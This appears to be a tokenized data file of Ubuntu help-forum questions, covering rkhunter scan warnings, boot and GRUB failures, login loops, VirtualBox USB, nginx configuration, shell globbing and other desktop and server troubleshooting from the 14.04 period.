481672	rkhunter 122 suspect files ; do i have a problem ?	i am new to ubuntu . i am using xfce ubuntu 14.04 lts . i have ran rkhunter a few weeks age and only got a few warnings . the forum said that they were normal . but , this time rkhunter reported 122 warnings . please advise . casey @ shaman : ~ $ sudo rkhunter -c [ rootkit hunter version 1.4.0 ] checking system commands ... performing 'strings ' command checks checking 'strings ' command [ ok ] performing 'shared libraries ' checks checking for preloading variables [ none found ] checking for preloaded libraries [ none found ] checking ld_library_path variable [ not found ] performing file properties checks checking for prerequisites [ warning ] /usr/sbin/adduser [ warning ] /usr/sbin/chroot [ warning ] /usr/sbin/cron [ ok ] /usr/sbin/groupadd [ warning ] /usr/sbin/groupdel [ warning ] /usr/sbin/groupmod [ warning ] /usr/sbin/grpck [ warning ] /usr/sbin/nologin [ warning ] /usr/sbin/pwck [ warning ] /usr/sbin/rsyslogd [ warning ] /usr/sbin/useradd [ warning ] /usr/sbin/userdel [ warning ] /usr/sbin/usermod [ warning ] /usr/sbin/vipw [ warning ] /usr/bin/awk [ warning ] /usr/bin/basename [ warning ] /usr/bin/chattr [ warning ] /usr/bin/cut [ warning ] /usr/bin/diff [ warning ] /usr/bin/dirname [ warning ] /usr/bin/dpkg [ warning ] /usr/bin/dpkg-query [ warning ] /usr/bin/du [ warning ] /usr/bin/env [ warning ] /usr/bin/file [ warning ] /usr/bin/find [ warning ] /usr/bin/get [ warning ] /usr/bin/groups [ warning ] /usr/bin/head [ warning ] /usr/bin/id [ warning ] /usr/bin/killall [ ok ] /usr/bin/last [ warning ] /usr/bin/lastlog [ warning ] /usr/bin/ldd [ warning ] /usr/bin/less [ ok ] /usr/bin/locate [ ok ] /usr/bin/logger [ warning ] /usr/bin/lsattr [ warning ] /usr/bin/lsof [ ok ] /usr/bin/mail [ ok ] /usr/bin/md5sum [ warning ] /usr/bin/mlocate [ ok ] /usr/bin/newgrp [ warning ] /usr/bin/passwd [ warning ] /usr/bin/perl [ warning ] /usr/bin/pgrep [ warning ] /usr/bin/pkill [ warning ] /usr/bin/pstree [ ok ] /usr/bin/rkhunter [ ok ] /usr/bin/rpm [ warning ] /usr/bin/runcon [ warning ] /usr/bin/sha1sum [ warning ] /usr/bin/sha224sum [ warning ] /usr/bin/sha256sum [ warning ] /usr/bin/sha384sum [ warning ] /usr/bin/sha512sum [ warning ] /usr/bin/size [ warning ] /usr/bin/sort [ warning ] /usr/bin/stat [ warning ] /usr/bin/strace [ warning ] /usr/bin/strings [ warning ] /usr/bin/sudo [ warning ] /usr/bin/tail [ warning ] /usr/bin/test [ warning ] /usr/bin/top [ warning ] /usr/bin/touch [ warning ] /usr/bin/tr [ warning ] /usr/bin/uniq [ warning ] /usr/bin/users [ warning ] /usr/bin/vmstat [ warning ] /usr/bin/w [ warning ] /usr/bin/watch [ warning ] /usr/bin/wc [ warning ] /usr/bin/wget [ warning ] /usr/bin/whatis [ warning ] /usr/bin/whereis [ warning ] /usr/bin/which [ ok ] /usr/bin/who [ warning ] /usr/bin/whoami [ warning ] /usr/bin/unhide.rb [ warning ] /usr/bin/mawk [ warning ] /usr/bin/lwp-request [ warning ] /usr/bin/heirloom-mailx [ ok ] /usr/bin/w.procps [ warning ] /sbin/depmod [ warning ] /sbin/fsck [ warning ] /sbin/ifconfig [ warning ] /sbin/ifdown [ warning ] /sbin/ifup [ warning ] /sbin/init [ warning ] /sbin/insmod [ warning ] /sbin/ip [ warning ] /sbin/lsmod [ warning ] /sbin/modinfo [ warning ] /sbin/modprobe [ warning ] /sbin/rmmod [ warning ] /sbin/route [ warning ] /sbin/runlevel [ warning ] /sbin/sulogin [ warning ] /sbin/sysctl [ warning ] /bin/bash [ warning ] /bin/cat [ warning ] /bin/chmod [ warning ] /bin/chown [ warning ] /bin/cp [ warning ] /bin/date [ warning ] /bin/df [ warning ] /bin/dmesg [ warning ] /bin/echo [ warning ] /bin/ed [ ok ] /bin/egrep [ warning ] /bin/fgrep [ warning ] /bin/fuser [ ok ] /bin/grep [ warning ] /bin/ip [ warning ] /bin/kill [ warning ] /bin/less [ ok ] /bin/login [ warning ] /bin/ls [ warning ] /bin/lsmod [ warning ] /bin/mktemp [ warning ] /bin/more [ warning ] /bin/mount [ warning ] /bin/mv [ warning ] /bin/netstat [ warning ] /bin/ping [ warning ] /bin/ps [ warning ] /bin/pwd [ warning ] /bin/readlink [ warning ] /bin/sed [ warning ] /bin/sh [ warning ] /bin/su [ warning ] /bin/touch [ warning ] /bin/uname [ warning ] /bin/which [ ok ] /bin/kmod [ warning ] /bin/dash [ warning ] [ press < enter > to continue ] checking for rootkits ... performing check of known rootkit files and directories 55808 trojan - variant a [ not found ] adm worm [ not found ] ajakit rootkit [ not found ] adore rootkit [ not found ] apa kit [ not found ] apache worm [ not found ] ambient ( ark ) rootkit [ not found ] balaur rootkit [ not found ] beastkit rootkit [ not found ] bex2 rootkit [ not found ] bobkit rootkit [ not found ] cb rootkit [ not found ] cinik worm ( slapper.b variant ) [ not found ] danny-boy 's abuse kit [ not found ] devil rootkit [ not found ] dica-kit rootkit [ not found ] dreams rootkit [ not found ] duarawkz rootkit [ not found ] enye lkm [ not found ] flea linux rootkit [ not found ] fu rootkit [ not found ] fuck`it rootkit [ not found ] gaskit rootkit [ not found ] heroin lkm [ not found ] hjc kit [ not found ] ignokit rootkit [ not found ] intoxonia-ng rootkit [ not found ] irix rootkit [ not found ] jynx rootkit [ not found ] kbeast rootkit [ not found ] kitko rootkit [ not found ] knark rootkit [ not found ] ld-linuxv.so rootkit [ not found ] li0n worm [ not found ] lockit / ljk2 rootkit [ not found ] mood-nt rootkit [ not found ] mrk rootkit [ not found ] ni0 rootkit [ not found ] ohhara rootkit [ not found ] optic kit ( tux ) worm [ not found ] oz rootkit [ not found ] phalanx rootkit [ not found ] phalanx2 rootkit [ not found ] phalanx2 rootkit ( extended tests ) [ not found ] portacelo rootkit [ not found ] r3dstorm toolkit [ not found ] rh-sharpe 's rootkit [ not found ] rsha 's rootkit [ not found ] scalper worm [ not found ] sebek lkm [ not found ] shutdown rootkit [ not found ] shv4 rootkit [ not found ] shv5 rootkit [ not found ] sin rootkit [ not found ] slapper worm [ not found ] sneakin rootkit [ not found ] 'spanish ' rootkit [ not found ] suckit rootkit [ not found ] superkit rootkit [ not found ] tbd ( telnet backdoor ) [ not found ] telekit rootkit [ not found ] t0rn rootkit [ not found ] trnkit rootkit [ not found ] trojanit kit [ not found ] tuxtendo rootkit [ not found ] urk rootkit [ not found ] vampire rootkit [ not found ] vckit rootkit [ not found ] volc rootkit [ not found ] xzibit rootkit [ not found ] zarwt.kit rootkit [ not found ] zk rootkit [ not found ] [ press < enter > to continue ] performing additional rootkit checks suckit rookit additional checks [ ok ] checking for possible rootkit files and directories [ none found ] checking for possible rootkit strings [ none found ] performing malware checks checking running processes for suspicious files [ none found ] checking for login backdoors [ none found ] checking for suspicious directories [ none found ] checking for sniffer log files [ none found ] performing linux specific checks checking loaded kernel modules [ ok ] checking kernel module names [ ok ] [ press < enter > to continue ] checking the network ... performing checks on the network ports checking for backdoor ports [ none found ] checking for hidden ports [ skipped ] performing checks on the network interfaces checking for promiscuous interfaces [ none found ] checking the local host ... performing system boot checks checking for local host name [ found ] checking for system startup files [ found ] checking system startup files for malware [ none found ] performing group and account checks checking for passwd file [ found ] checking for root equivalent ( uid 0 ) accounts [ none found ] checking for passwordless accounts [ none found ] checking for passwd file changes [ warning ] checking for group file changes [ warning ] checking root account shell history files [ none found ] performing system configuration file checks checking for ssh configuration file [ not found ] checking for running syslog daemon [ found ] checking for syslog configuration file [ found ] checking if syslog remote logging is allowed [ not allowed ] performing filesystem checks checking /dev for suspicious file types [ warning ] checking for hidden files and directories [ warning ] [ press < enter > to continue ] system checks summary ===================== file properties checks ... required commands check failed files checked : 137 suspect files : 122 rootkit checks ... rootkits checked : 291 possible rootkits : 0 applications checks ... all checks skipped the system checks took : 5 minutes and 11 seconds all results have been written to the log file ( /var/log/rkhunter.log )
481673	windows xp wo n't boot anymore	i 'm not trying a dual boot . i plan to retire xp once i 've picked a windows version to replace it or have found that i can successfully get linux to replace it for all my gaming needs . at the moment , i have n't figured out how to get windows xp set up with ahci and do n't really care to , so i 'm swapping my boot drives as follows : 1 for windows xp 1 for ubuntu 1 for zorin os 8 gaming 1 for windows 8.1 enterprise and changing bios back to ide when i put the windows xp boot ssd back in . each os is installed on its own drive that is not physically in the computer unless that os is the one i want to boot from . i installed ubuntu 14.04 on the 320gb hard drive i had laid out for my tests on it . after it completed the installation , it attempted to reboot , but it failed to start back up ( i have no idea why ) , so i stuck windows xp back in so that i could play some games and it went to some menu talking about `` grub recovery '' or something like that . i 've found two threads talking about why i 'm getting that error , but now i ca n't get back to that . http : //ubuntuforums.org/showthread.php ? t=1393848 http : //ubuntuforums.org/showthread.php ? t=1291280 at this point , it tells me that i need to insert the proper boot media . windows xp is the only disk with an os in the computer and pressing `` shift '' as explained in another thread ( how to get to the grub menu at boot-time , on a single-boot system ( not dual-boot ) ? ) is n't working to get me into grub . so i have two questions : why am i having problems booting into ubuntu ? why am i having problems booting into xp ?
481674	automatically run a command after unlocking screen/wake up ?	is there an easy way to make ubuntu run a specified command each time i unlock the screen ( after an overlay with password prompt dissapears ) ?
481676	tomcat clustering with mod_proxy	i tried tomcat clustering with mod_proxy .taken tomcat nodes like tomcat1 and tomcat2 .enabled cluster methods , changed port numbers in server.xml to the both tomcats and created cluster directory in tomcat webapps and placed sample test.jsp file in both the tomcats .in apache2 webserver enabled mod_proxy and edit virtual host file .but session replication is not worked out .
481677	can not download software from ubuntu software centres	my system shows broken packages with the following information pls help libqt4-qt3support , scripttools and sql-mysql installed vwesion is 4:4.8.1-0ubuntu4.5 while latest version is 4:4.8.1-0ubuntu4.8 when i am trying to fix it it shows error msg that unable to configure due to change in versions it is also not allowing to download any further software from ubuntu software centre
481678	hiding grub screen in ubuntu 14.04	i searched everything in this forum and tried all methods . setting grub timeout , grub hidden timeout , but nothing worked . it still shows me the grub menu and waits for 10 seconds and then boots to the default os set .
481680	laptop using 14.04 wo n't get past login gui	my laptop was working perfectly yesterday , and now today i ca n't log in . at first , i was only getting a black screen . however , after following instructions in some questions here on askubuntu , i first reinstalled lightdm , and then i had to change the ownership of the file ~/.xauthority to be my user name . now , i get the log in gui screen . however , once i enter my username , it flickers and then comes back to the login gui . it does not matter if i use gnome , unity , or gnome-flashback . i do n't know why lightdm needed to be reconfigured , or how ~/.xauthority got changed , but in any case , what is still standing in my way , preventing me from logging in ? update : i have tried deleting the .xauthority file , and the .profile files in my home directory . it has not changed anything . logging in as guest also fails to work . the following commands did not work : mv ~/.config ~/.config.bak mv ~/.cache ~/.cache.bak inside .xsession-errors in my home directory , it says : gdk-critical : gdk_x11_display_get_xdisplay : assertion 'gdk_is_display ( display ) ' failed
481682	ubuntu on hp proliant mi 350 gen 8 server / intel xeon e5-2403 processor	i use mostly ubuntu for open source gis and web server etc . i am unable to load ubuntu 12.04 on hp proliant mi 350 gen 8 server / intel xeon e5-2403 processor 10mb . if i have to shift to red-hat or suse , it will be another learning curve . pl help me install ubuntu on hp proliant mi 350 gen 8 server / intel xeon e5-2403 processor . i will use it for geoserver as a web server .
481685	is emerald theme manager available for ubuntu 14.04	i tried to search emerald theme manager in ubuntu software center but it 's not available ?
481688	wifi dropping in lenovo thinkpad t410	my wifi is constant dropping and i am not able to get a consistent connection , not even for a minute . my laptop is a lenovo thinkpad t410 and the ubuntu 14.04 is a fresh install . so is this a kernel problem or my laptop wifi card problem ?
481691	ubuntu 14.04 mouse pointer does not move	i 'm using ubuntu 14.04 , after updating the unity does n't load . the sidebar and topbar disappear . on the main screen , there are only the background and the pointer . i 've solved this problem by entering these commands sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity sudo apt-get remove -- purge nvidia* sudo shutdown -r now after rebooting , the side bar does appear , however now the mouse pointer disappears . i make the pointer visible by entering this command : gsettings set org.gnome.settings-daemon.plugins.cursor active false the mouse pointer now appears but it does not move ( it freezes ) . can someone guide me how to solve this problem ?
481693	virtualbox usb 'add device filter` does not work under 14.04	ďťżto make usb devices accessible to a guest os under virtualbox , one must i ) install the appropriate extension pack ii ) navigate to 'settings -- -- > usb ' in the virtualbox menu and iii ) tick 'enable usb 2.0 ( ehci ) controller iv ) add a `usb device filter` step iv ) requires selecting a usb device filter by clicking on a list of available usb devices which appears at the mouse-pointer position when clicking on the 'add new usb filter` icon on the right margin ( a usb icon with a green plus sign ) when pressing alt+ins in either case one will see a list of usb device candidates currently attached to the host system . these can then be selected and will appear permanently under the 'usb device filters ' list of the usb menu . this does not work under 14.04 . when attempting to add an attached device ( clicking on appropriate icon or pressing alt+ins ) virtualbox can not see any of the connected usb devices , resulting in a < no devices available > message . trying to enter the device details manually into a blankly created usb device filter does not work either . booting the guest os ( win 7 ) , you are not able to see any 'removable drives ' . the obvious items were all checked : virtualbox installed from repository ( apt-get install ) app reports version 4.3.10 appropriate virtualbox extension pack ( 4.3.1r93733 ) successfully downloaded+installed from the oracle site as mentioned previously on the the same box with 12.04 installed everything works as it should and win7 can see the removable drive as expected . as a last resort various permutations of vm settings , usb sticks , e.t.c . were tried without achieving the desired result . has anyone encountered the same issue ? has anyone encountered similar difficulties ? has anyone been able to work around the problem ? ( remember manual entry of device details into an empty filter entry has not worked ) does anyone know if this is an issue with virtualbox ? with the current version of the virtualbox extension pack ? or perhaps even with trusty tahr itself ? i have full usb functionality on my 14.04 host .
481695	is my gparted partition editor looking okey ?	so . i re-installed ubuntu and there were some things that shoud have been preinstalled but are not . one of them was gparted . here is a screenshot of my gparted . is it okey , i 'm in a bit of doubt .
481698	installing authen : :simple : :pam module with cpan in ubuntu fails	i 'm trying to install the authen : :simple : :pam module using cpan from ubuntu terminal and i get an error as shown below ( note other modules install perfectly ) checking if your kit is complete ... looks good checking for gcc ... cc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether cc accepts -g ... yes checking for cc option to accept ansi c ... none needed checking how to run the c preprocessor ... cc -e checking for pam header files in ... no configure : error : can not find the pam_appl.h file error in configuring the authen : :pam module . warning : no success on command [ /usr/bin/perl makefile.pl installdirs=site ] nikip/authen-pam-0.16.tar.gz /usr/bin/perl makefile.pl installdirs=site -- not ok running make test make had some problems , wo n't test running make install make had some problems , wo n't install could not read metadata file . falling back to other methods to determine prerequisites
481705	accessing a novell share on trusty tahr ?	after upgrading my pc to the current lts release 14 . 04 , i found that i ca n't access novell shares using ncpfs any more . it seems that the ncp-related packages ( libncp and so on ) have been present in the 14.04 repos , but got removed : ( see launchpad , ubuntuupdates and debian bug # 712779 ) . is there still any way to install the ncp-related components ? are there any other tools to access or even mount a novell share from a 14.04 system ? edit : oddly enough , ncpfs and libncp are still available in the current lts version of mint ( mint 17 `` qiana '' ) .
481709	adobe air install problem , ubuntu x64 14.04	have n't seen this kind of error on askubuntu yet . did everything as it says here : how can i install adobe air ? after sudo ./adobeairinstaller.bin shows this image : dropbox.com/s/wg6cv03h5n1tqgr/adobe_air.png meanwhile terminal shows a bunch of such messages : ( setup:2579 ) : gtk-warning ** : unable to locate theme engine in module_path : `` murrine '' , nothing is installed . those murrine - it showed another code before ( another than setup:2579 ) - i googled it , installed something , it showed another code - i googled it , installed something , etc . does n't seem to affect installation anyhow .
481711	no voice on front headphone port .	i have a strange problem . it just happen recently , when i accidentally unplug my headphone . but i unplugged it before and nothing happen . basically now , when i use my headphone through front jack , when playing videos , i ca n't hear voice . only background music . using kde sound setup , pressing front left and front right test button , result in a mono sound . no distinction between right and left . this only happen with front jack . rear jack is working fine .
481712	modify ath9k driver and debug with aircrack-ng	i own an alfa adapater with atheros ar9271 . what i would like to do is to edit the driver this device uses ( do some modifications in the source ) and debug it . i 'm really new to this , a start guide would be really appreciated . btw , my question is similar to the question in this topic : how to modify wireless ath5k driver ? but i did n't find an answer to work with ( that explains the whole process ) thank you very much in advance
481713	vlc sound menu integration broken 14.04	my sound menu integration of vlc seems to be broken ( see screenshot ) , also the multimedia keys do not work any more . is there a package i am missing ? ! the back forward buttons in the sound menu do not work either . i 'm running vlc version 2.1.4 other players work as expected ( such as gnome-mplayer ) i 'm running 14.04 , before everything worked fine ... edit : output of dpkg -l vlc* ii vlc 2.1.4-0ubunt amd64 multimedia player and streamer ii vlc-data 2.1.4-0ubunt all common data for vlc ii vlc-nox 2.1.4-0ubunt amd64 multimedia player and streamer ( w ii vlc-plugin-not 2.1.4-0ubunt amd64 libnotify plugin for vlc ii vlc-plugin-pul 2.1.4-0ubunt amd64 pulseaudio plugin for vlc edit2 : since there seems to be no obvious solution to that problem , i submitted a bug report : https : //bugs.launchpad.net/ubuntu/+source/indicator-sound/+bug/1331460
481715	why does n't `` cd '' work in a shell script ?	what is wrong with this easy script ? i just want to write an script which change my directory : a. i put below commands on the file witch its name is pathabc on the /home/alex directory , # ! /bin/sh cd /home/alex/documents/a/b/c echo helloworld b. also i did chmod +x pathabc , on the terminal when i am on the /home/alex directory , i run ./pathabc . but the output is just helloworld and the current directory remains with no change . i mean my directory remains as /home/alex and not go to the /home/alex/documents/a/b/c . so where is wrong ?
481716	while installing , stays copying files , stuck !	i have an old dell desktop that is running windows xp home edition . i 've downloaded ubuntu and installed it straight from the iso file . when i boot my computer i choose to run ubuntu , simple , then it needs to install ; however , it gets to about 3 quarters of the way and just stays there waiting does n't do anything : / can anyone help me out ? : /
481720	single click on some software behaving not good ?	i am using ubuntu 13.10 version and some of software such as artha dictionary software or dukto software etc , these are not opening with single click until click and open them twice . this behavior of ubuntu is exhausted . how to get rid of this problem ?
481722	ftp server web administration gui	i 'm looking for a free ftp solution ( on linux ) with web admin interface . is there one ? i need to delegate this role to non-it person so for example project manager etc . because of that it needs to be simple .
481726	no operating system found even when grub2 was reinstalled	i know there have been many variations on this question and have certainly tried to do my research . i do n't really know what i 'm doing so i would rather not take risks . i am trying to dual boot xubuntu and windows 7 . i started out with xubuntu and just installed windows . of course , the mbr got overwritten and windows did n't seem to recognize linux . so i booted to the live cd and rewrote the mbr . and of course , now i get the error `` no operating system found '' on startup . i have been following these tutorials to help me out . community.linuxmint.com/tutorial/view/245 unix.stackexchange.com/questions/96977/grub-wont-install ubuntuforums.org/showthread.php ? t=2036730 specifically , i ran these commands : # sdb2 is the partition with xubuntu sudo mount /dev/sdb2 /mnt # sdb1 is my boot partition sudo mount /dev/sdb1 /mnt/boot # not sure what this does , but ran it anyway ... for i in /dev /dev/pts /proc /sys /run ; do sudo mount -b $ i /mnt $ i ; done sudo chroot /mnt # once chrooted grub-install /dev/sdb update-grub here 's a link to my gparted https : //www.dropbox.com/s/zpbbzh9z7k1l3pj/gparted.png edit -- - did n't realize that the drive letters are different in the picture than in my code ( its sda in the pic instead of sdb ) . i have been restarting a lot and sometimes the drive letters change and make my usb into sda .
481728	no minimize/maximize buttons in gnome 3	i have installed ubuntu gnome 14.04 the problem is : nautilus ( i think it called `` files '' in gnome-shell ) has no minimize/maximize button ! i have enabled gnome-tweak-tool - > windows - > maximized/minimized , but nautilus has not minimize/maximize buttons ! any ideas ?
481730	ubuntu 14.04 dual boot install	i have windows 7 ( 64 bit ) installed on my system along with ubuntu 12.04 . i want to upgrade to 14.04 version of ubuntu but since i do not have a good internet connection i am unable to upgrade it using update manager . i somehow managed to get a .iso file downloaded . is there some way i can upgrade using a cd or usb drive ? i am not sure which boot loader i have . i installed 12.04 using wubi installer . i dont want to mess up my system so please someone help me regarding this ? ?
481740	existing laravel 4 project gives 404 in browser	i 'm trying to set up a development environment on a virtual machine running ubuntu 14.04 lts using nginx and hhvm . to do this , i followed the tutorial here . this goes well with a new installation of laravel . but when i import an existing laravel 4 project and try to open that on my actual machine ( which will serve as the client running windows 7 ) , i 'm getting a 404 file not found error on the screen while connecting to http : //sav.savrichard.dev . i did add this to the hosts file with the correct ip address . the virtual machine is receiving the request and responds with a 404 error . how do i solve this error ? i 'm pretty new to ubuntu so i 'm not exactly sure what 's wrong . the project is located at /var/www/sav.savrichard.net the server configuration is as follow : server { listen 80 default_server ; root /var/www/sav.savrichard.net/public ; index index.html index.htm index.php ; server_name sav.savrichard.dev ; access_log /var/log/nginx/localhost.sav.savrichard.dev-access.log ; error_log /var/log/nginx/localhost.sav.savrichard.dev-error.log error ; charset utf-8 ; location / { try_files \ $ uri \ $ uri/ /index.php ? \ $ query_string ; } location = /favicon.ico { log_not_found off ; access_log off ; } location = /robots.txt { log_not_found off ; access_log off ; } error_page 404 /index.php ; include hhvm.conf ; # deny .htaccess file access location ~ /\.ht { deny all ; } } and the hhvm.conf file is : location ~ \ . ( hh|php ) $ { fastcgi_keep_conn on ; fastcgi_pass 127.0.0.1:9000 ; fastcgi_index index.php ; fastcgi_param script_filename $ document_root $ fastcgi_script_name ; include fastcgi_params ; } edit 1 ( 13-06-2014 ) i tried to do a fresh install using a different ubuntu 14.04 vm , but i 'm getting the same error when trying to access the root directory through localhost in the browser . the error is , like last time , 404 file not found . edit 2 ( 13-06-2014 ) as by request of roadmr , here are the entries in the access and error logs . access log the entries read like this : 192.168.174.1 - - [ 13/jun/2014:10:16:45 -0700 ] `` get / http/1.1 '' 404 49 `` - '' `` mozilla/5.0 ( windows nt 6.1 ; wow64 ) applewebkit/537.36 ( khtml , like gecko ) error log yes , the error log is actually blank . edit 3 ( 13-06-2014 ) added the same entry to the ubuntu host file as i have in the windows machine . same result . edit 4 ( 13-06-2014 ) maybe it 's useful to note that the local ip address of the ubuntu vm is 192.168.174.130 and the local machine running windows 7 is 192.168.2.105
481742	how to replace nautilius with nemo in gnome 3	i would like to replace nautilus ( default gnome shell file manager ) with nemo file manger in gnome 3 . how can i do that ?
481745	how do i prevent software packages from being downloaded until i know it 's safe ?	recently , an update that caused a problem with gnome session caused me to lose a day 's work . the solution was to rollback some packages to a previous version . the update manager is now telling me that my old packages should be updated : ... but i do n't want to do that until i know that whatever bug or problem the latest version has is resolved . i understand that with any upgrade that there is a risk of instability . however , in the 8 years or more that i 've been on ubuntu , using the latest releases has been stable enough and with the benefit of the latest features and security . so , i 'm not looking for general advice on how to handle upgrades . what i 'm saying is that in this one particular instance , the bug introduced by these upgrades is severe and time wasting . but , as an end user , when i encounter a problem like this , i have no idea how to address a specific concern about a specific package . i do n't , for example , know which of these packages is the problem , and i ca n't take time from my work schedule to be experimenting with each package . so , my question is : how do i find out who exactly is responsible for these , or any , packages so that i can contact them and let them know about the problem ? how do i freeze these packages only , but allow other upgrades to happen ? ubuntu-session gnome-session-common gnome-session-bin gnome-session
481748	torrent applications getting slow download speed ?	allowed port in ip tables with this command `` sudo iptables -a input -p tcp -- dport 6881 -j accept '' . after ran this command , transmission client port shows open but in next 30 seconds it 's shows closed ... . is there any option to allow port to particular application .
481751	files deleted using linux still show up in windows	i use ubuntu and windows 7 as dual boot . i deleted a video from the downloads folder in c drive while using my ubuntu os . i simply selected the video and did a shift+delete . when i switch to windows , the file still shows up , although it gives an error while trying to open . how do i get rid of the icon of the video that still shows up ? what went wrong while deleting it in ubuntu ? or is the reason the procedure of deletion ?
481759	14.04 - gnome forgets disabled keyboard shortcuts after boot . is there a workaround ?	it is a very annoying bug : i need the keys combination < ctrl > < alt > arrows for some other use ( eclipse ) . but this combination is reserved by gnome for navigation . disabling it in settings > keyboard > shortcuts ( gnome-control-center ) works fine until i restart ubuntu . so i need to disable it again and again every boot . is there a command line to disable this combination , and i 'll make it run automatically after boot ?
481760	why no shell expansion ?	why might bash not expand * ? i want to remove all the sites-* files except for the last one , but i would like to test the expansion before running the command and rm lacks a -- dry-run option : $ ls -la total 1856 drwxr-xr-x 4 dotancohen dotancohen 12288 jun 11 13:33 . drwxrwxr-x 28 dotancohen dotancohen 4096 jun 6 18:04 .. -rw-r -- r -- 1 dotancohen dotancohen 3072 jun 10 15:07 sites-1402402025.sqlite3 -rw-r -- r -- 1 dotancohen dotancohen 7168 jun 10 15:08 sites-1402402111.sqlite3 -rw-r -- r -- 1 dotancohen dotancohen 12288 jun 10 15:13 sites-1402402393.sqlite3 -rw-r -- r -- 1 dotancohen dotancohen 9216 jun 10 15:15 sites-1402402493.sqlite3 -rw-r -- r -- 1 dotancohen dotancohen 9216 jun 10 15:16 sites-1402402540.sqlite3 -rw-r -- r -- 1 dotancohen dotancohen 592896 jun 10 15:48 sites-1402403316.sqlite3 $ ls sites-1402402402* ls : can not access sites-1402402402* : no such file or directory $ echo rm sites-1402402402* rm sites-1402402402* $ echo sites-1402402402* sites-1402402402* $ find sites-1402402402\* find : `sites-1402402402* ' : no such file or directory i know that i could use the -i option with yes no piped to it , but i would like to diagnose this expansion problem . i do n't have any unusual bash configurations , though i can not simple disable .bashrc for unrelated reasons right now . therefore , i ask what might prevent bash from performing shell expansion ?
481762	penetration and security of ubuntu operating system and it 's working	i was reading about ubuntu and linux systems that they are immune to malware and virus attacks due to their well managed and good architecture . so the question is how much secure a ubuntu system is without any supportive anti-virus and other security software 's . what packages are preferred to be used with ubuntu for secure computing ? ? i am emphasizing on how much secure is ubuntu from penetration point of veiw..and if it is so much immune then how does it do so ... or if it is not immune which packages are preffered to be used to make it more secure to any penetration attempt ? ?
481763	c++ system ( ) function for further arguments in ubuntu	i did n't really know how to even look for the solution for this one . my problem is , how to execute system commands in c++ using function system ( ) ; but for more arguments ( come on it sounds awful ) . let me explain : try for example to type something like this in termianl : lynx www.somewebsiteidunnowhatever.com -get_data and here we go , empty line asking us for input . you can type something like : name=travis & age=45 & hobby=football -- - after that we would see some result . now i ca n't manage how to achievie such behaviour with system ( ) ; my c++ script stop responding when that empty line occures . please help ...
481766	firefox does not display text after the installation of new fonts	ubuntu 14.04 , after install new fonts , when enter a page , firefox just display images , it does not display text . i tried to chown the folder /usr/share/fonts ' to my user andchmodthe folder/usr/share/fontsto777` but it still does not display text .
481767	terrible screen tearing on ubuntu 14.04 lts with nvidia proprietary driver	so i installed ubuntu about a week ago after finally getting around to sorting out my partitions . everything has gone great except that i get screen tearing on anything that goes fullscreen . i 've searched around and tried loads of different solutions but none have worked . my gfx card is a nvidia gt 650m , i hope someone has a solution .
481768	mcafee endpoint encryptionfor dual boot	i have an ubuntu 14.04 and win 7 on dual boot mode . it is working fine without problems . now i am forced to install the mcafee endpoint encryption . doing so , is it possible for me to still boot to windows and linux like the usual way ? or will the mcafee interfere with the grub making life difficult for me ?
481769	restarting network manager every time	i am running an ubuntu 13.10 . every time i reboot my computer , i have go to the terminal and type : sudo service network-manager restart to get wi-fi running . is there any way to make this process automatic ? it 's also annoying that it takes so long so reboot , due to a `` waiting an additional 60 seconds for network configuration '' . thank you .
481772	moving a subdirectory folder and its file to a new partition	please take a look into my partition : ) i still do n't know how to move the folder that mounted on old partition this is the screenshot i 've to insert a new hdd to it , so the folder /media/samba_disk_1/data/lrn and its old data still there : ) please help me , i 'm sorry if my english is so bad t ( ^_^ )
481774	chrome unstable in 14.04	i 've been running 14.04 since its release and chrome seems to be running very flaky on my instance . it does not render properly sometimes . sudden closes . at first i thought it was some issues with my old config files , so i erased all of them . it 's a little more stable ( takes longer for issues to appear ) but they are still there . running google-chrome -- diagnostics i get the following error : [ fail ] user preferences integrity file too big any hints ?
481776	installing problems with 14.04 alongside windows 7	i 've tried to install 14.04 with a dvd . first the 64-bit version . it went all fine until i was asked how i wanted it installed . i chose alongside windows 7 , and it asked me to remove the installation device and press enter . i removed the dvd , pressed enter , and the computer rebooted , but with windows . nothing else happened , i could just use windows as normal , or try again . any idea how to fix this ? i then tried with the 32-bit version ( i also have a 32-bit version of windows 7 ) . this one does not provide the option to install alongside windows 7 . this is strange , because i previously did it , and i 'm just trying to re-install it after i restored my computer to factory settings . is it possible that the partition for linux is still on my drive ? how can i assign it again and increase its size . if not , any idea on how to solve this is very welcome ! thanks a lot !
481777	ubuntu : remount troubleshooting	i 've got : read-only usb device . i want : remount it with rw permissions sudo mount -o rw , remount /media/user/mypassport/ problem : mount : /media/user/mypassport not mounted or bad option
481780	switch between file tabs in geany	open some files with geany how to switch between tabs by key switch ? for example you open file1 and file2 and file3 with geany . i am looking for key shortcut to switch between them i mean switch between tab . i do not like use mouse to select tabs ! !
481784	how to limit download size of a file in ubuntu server ?	i am working on a ubuntu server . i want to limit the maximum download size of a file from internal network . i know squid has an option but i dont want to use squid . can anybody tell me how to do it .
481787	graphics card enhancement	i have the following specs on my system76 laptop ( ubuntu 14.04 64 bit ) intel® iris™ pro graphics 5200 4th generation intel® core™ i7-4750hqprocessor ( 2.0 ghz 6mb l3 cache - 4 cores plus hyperthreading ) 16 gb dual channel ddr3 sdram at 1600mhz - 2 x 8 gb is there any kind of software tweaks i can do to enhance the quality of the images that come in on my graphics card from when i play steam . please suggest any kind of package ( s ) or modifications i can do that will give me a better picture/resolution/display .
481788	14.04 lts | unity reset but cant login normally	i have reset unity successfully , but i can not login normally via the login screen . this is an update to 14.04 lts no dash / launcher after update through software updater steps i follow : login screen - > blank ... no dash / no launcher / no status ( notification ) bar on top ctrl+alt+f1 to bash terminal export display=:0 unity-tweak-tool -- reset-unity ( this does not complete , blocks on opengl ) i anyways continue to by doing : ctrl+alt+f7 . launcher & dash look good . but there is ( a ) no status / notification bar on top continuing to work this way . have n't logged out since . please suggest a permanent solution .
481789	unknown error in my system ( 14.04 )	i am using 14.04 for last few months , now it 's showing an unknown error in the notification area , as shown in the below image ... when i click there am getting message as , '' the updated information is outdated . this may be cause by network problems or by a repository that is no longer available . please update manually by selecting `` show updates '' from indicator menu , and watching for failing repositories . '' but when i click `` show updates '' , am getting as '' the software on this computer is up to date '' ( see the image below ) please tell me , what can i do ... .
